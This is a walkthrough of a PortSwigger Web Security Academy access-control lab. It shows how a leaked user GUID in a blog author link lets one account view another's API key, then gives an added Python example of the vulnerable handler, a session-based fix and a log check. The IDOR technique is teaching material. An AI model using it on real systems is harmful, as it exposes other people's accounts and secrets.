| Field | Details |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Access Control (Horizontal Privilege Escalation, IDOR with GUIDs) |
| Difficulty | Apprentice |
| Objective | Find the GUID for carlos, then submit his API key as the solution |
User ID Controlled by Request Parameter, with Unpredictable User IDs
Log in as wiener:peter and open the account page:

```text
My Account
Your username is: wiener
Your API Key is: XWM6DGHlCIbc3D9cz8TJmvYT3k772aYQ
```
Intercepting the account page request itself:

```http
GET /my-account?id=394d99cd-e1d8-41db-a722-b1cabe1ef61d HTTP/2
```
Our own GUID is the value of the `id` parameter. GUIDs aren't guessable, but the lab hint says the user IDs leak elsewhere, so the blog posts are the next place to check. Navigating to a post made by carlos and inspecting the author link:

```html
<span id="blog-author"><a href="/blogs?userId=837bd349-0dd3-4b64-8ee9-84b64dea4d0d">carlos</a></span>
```
There's Carlos's GUID. Requesting the account page with his ID in place of ours:

```text
web-security-academy.net/my-account?id=837bd349-0dd3-4b64-8ee9-84b64dea4d0d
```
Carlos's account page renders, including his API key.
Submitting Carlos's API key as the solution solves the lab.
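The root cause is that the server uses the client-supplied `id` parameter as the identity instead of the authenticated session, so an unguessable GUID only helps until it leaks somewhere public. The following is an added example, not the lab's or PortSwigger's code: a minimal model of the vulnerable `/my-account` handler beside a fixed one that derives the account from the session and rejects mismatched IDs, plus a small check that flags cross-account requests in constructed log lines. The session and request shapes, the user store and the placeholder API keys are assumptions for illustration; only the two GUIDs come from the lab.

```python
"""Added example (not the lab's code): IDOR on /my-account?id=<guid>, its fix,
and a log check for cross-account requests. Session/request shapes are assumed."""
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Constructed user store keyed by the GUIDs seen in the lab; API keys are placeholders.
USERS = {
    "394d99cd-e1d8-41db-a722-b1cabe1ef61d": {"username": "wiener", "api_key": "WIENER_KEY_PLACEHOLDER"},
    "837bd349-0dd3-4b64-8ee9-84b64dea4d0d": {"username": "carlos", "api_key": "CARLOS_KEY_PLACEHOLDER"},
}


def my_account_vulnerable(session: dict, params: dict) -> tuple[int, Optional[dict]]:
    """Mirrors the lab: the request parameter decides whose account is shown,
    and the session is never consulted."""
    user = USERS.get(params.get("id", ""))
    if user is None:
        return 404, None
    return 200, user


def my_account_fixed(session: dict, params: dict) -> tuple[int, Optional[dict]]:
    """Authorization comes from the authenticated session, never from the request.
    A mismatched id is rejected (not silently ignored) so the attempt is visible."""
    owner_id = session.get("user_id")
    if owner_id is None or owner_id not in USERS:
        return 401, None
    requested = params.get("id")
    if requested is not None and requested != owner_id:
        return 403, None
    return 200, USERS[owner_id]


# Constructed access-log lines: "<session user guid> <method> <path>"
SAMPLE_LOG = [
    "394d99cd-e1d8-41db-a722-b1cabe1ef61d GET /my-account?id=394d99cd-e1d8-41db-a722-b1cabe1ef61d",
    "394d99cd-e1d8-41db-a722-b1cabe1ef61d GET /blogs?userId=837bd349-0dd3-4b64-8ee9-84b64dea4d0d",
    "394d99cd-e1d8-41db-a722-b1cabe1ef61d GET /my-account?id=837bd349-0dd3-4b64-8ee9-84b64dea4d0d",
]


def flag_cross_account(log_lines: list[str]) -> list[tuple[str, str]]:
    """Return (session_user, requested_id) pairs where a session asked for
    /my-account with an id other than its own. Public routes like /blogs are ignored."""
    hits = []
    for line in log_lines:
        session_user, _method, target = line.split(" ", 2)
        parts = urlsplit(target)
        if parts.path != "/my-account":
            continue
        requested = parse_qs(parts.query).get("id", [None])[0]
        if requested is not None and requested != session_user:
            hits.append((session_user, requested))
    return hits


if __name__ == "__main__":
    wiener_session = {"user_id": "394d99cd-e1d8-41db-a722-b1cabe1ef61d"}
    carlos_params = {"id": "837bd349-0dd3-4b64-8ee9-84b64dea4d0d"}
    print("vulnerable:", my_account_vulnerable(wiener_session, carlos_params))
    print("fixed:     ", my_account_fixed(wiener_session, carlos_params))
    print("flagged:   ", flag_cross_account(SAMPLE_LOG))
```

The fixed handler could also simply drop the `id` parameter from the route, since the logged-in user's own page needs no identifier; returning 403 on a mismatch is chosen here so that probing shows up in logs, which is what `flag_cross_account` then picks out.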